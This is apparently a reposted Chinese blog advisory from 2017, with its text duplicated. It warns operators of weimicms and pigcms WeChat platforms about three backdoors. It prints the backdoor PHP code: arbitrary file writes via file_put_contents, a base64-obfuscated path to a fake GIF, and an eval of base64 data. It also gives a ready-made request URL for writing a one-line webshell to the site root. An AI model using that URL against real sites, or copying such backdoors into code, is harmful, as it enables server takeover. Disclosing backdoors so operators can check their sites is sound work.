网曝微信第三方平台出现惊人后门及漏洞 微米 weimicms pigcms 等
[ 2017-10-21 10:09:32 | 作者: admin ]
来源:http://blog.360dseo.com/
网曝微信第三方平台出现惊人后门及漏洞,后门及漏洞轻则导致网站无法访问,内容被篡改,严重的可能盗取服务器资料。
更严重的可能会获取服务器直接管理权限,因为代码属于正常参数提交,所以不会被杀毒软件及各种防火墙拦截,完全免疫!!!
后门1:
执行原理网址后加index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木马内容,
直接打开浏览就可以。笨蛋的说就是粘贴进网址按回车。
这里就是提交一句话木马写入到根目录muma.php内 由于很多程序做了转码,但是还是很多可以执行的。
通杀微信管家旧版admin2/index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木马代码
请勿将muma.php修改为index.php 否则会导致首页无法打开 只做测试使用,请勿用作非法用途
这一个算比较明显的注入后门。
后门2
本帖隐藏的内容
查找文件TAction.class.php
执行原理PHP图片注入木马//疑似后门,它生成文件tpl/User/default/common/images/face/104.gif
这个文件虽然是104.gif,但它的内容却是由提交参数写入的。
后门3
TagLib.class.php
本后门加密结果还是一句话注入后门程序
基本所有版本内都有,各位运营者抓紧检查吧,别等被黑的时候不知道为什么。其他未发现的后门木马数量未知,自行检查全站吧。代码加密的就先解密检查。
评论Feed: http://blog.xg98.com/feed.asp?q=comment&id=2456
网曝微信第三方平台出现惊人后门及漏洞,后门及漏洞轻则导致网站无法访问,内容被篡改,严重的可能盗取服务器资料。
更严重的可能会获取服务器直接管理权限,因为代码属于正常参数提交,所以不会被杀毒软件及各种防火墙拦截,完全免疫!!!
后门1:
WeixinAction.class.php
public function test($name, $data)
{
file_put_contents($name, $data);
}
这句话的意思就是在根目录生成文件data可以一句话木马提交注入。public function test($name, $data)
{
file_put_contents($name, $data);
}
执行原理网址后加index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木马内容,
直接打开浏览就可以。笨蛋的说就是粘贴进网址按回车。
这里就是提交一句话木马写入到根目录muma.php内 由于很多程序做了转码,但是还是很多可以执行的。
通杀微信管家旧版admin2/index.php?g=Home&m=Weixin&a=test&name=muma.php&data=木马代码
请勿将muma.php修改为index.php 否则会导致首页无法打开 只做测试使用,请勿用作非法用途
这一个算比较明显的注入后门。
后门2
本帖隐藏的内容
查找文件TAction.class.php
public function test(){
file_put_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='),htmlspecialchars($_GET['n']));
}
*file_put_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='),htmlspecialchars($_GET['n']));
}
执行原理PHP图片注入木马//疑似后门,它生成文件tpl/User/default/common/images/face/104.gif
这个文件虽然是104.gif,但它的内容却是由提交参数写入的。
后门3
TagLib.class.php
public function checkdat(){
@$string=file_get_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='));
//if($this->think_encrypt($this->thinkphpgetmi())!=$string){eval(base64_decode("ZXhpdCgpOw=="));}
}
而且本页里@$string=file_get_contents(base64_decode('dHBsL1VzZXIvZGVmYXVsdC9jb21tb24vaW1hZ2VzL2ZhY2UvMTA0LmdpZg=='));
//if($this->think_encrypt($this->thinkphpgetmi())!=$string){eval(base64_decode("ZXhpdCgpOw=="));}
}
$this->mat = $this->checkdat();
\Lib\Driver\TagLib\TagLibCx.class.php$baiduccheckdata=$this->checkdat();
这两个都只是赋值进去,并没有使用。本后门加密结果还是一句话注入后门程序
基本所有版本内都有,各位运营者抓紧检查吧,别等被黑的时候不知道为什么。其他未发现的后门木马数量未知,自行检查全站吧。代码加密的就先解密检查。
[最后修改由 admin, 于 2017-10-21 10:31:19]
评论Feed: http://blog.xg98.com/feed.asp?q=comment&id=2456
这篇日志没有评论。
此日志不可发表评论。
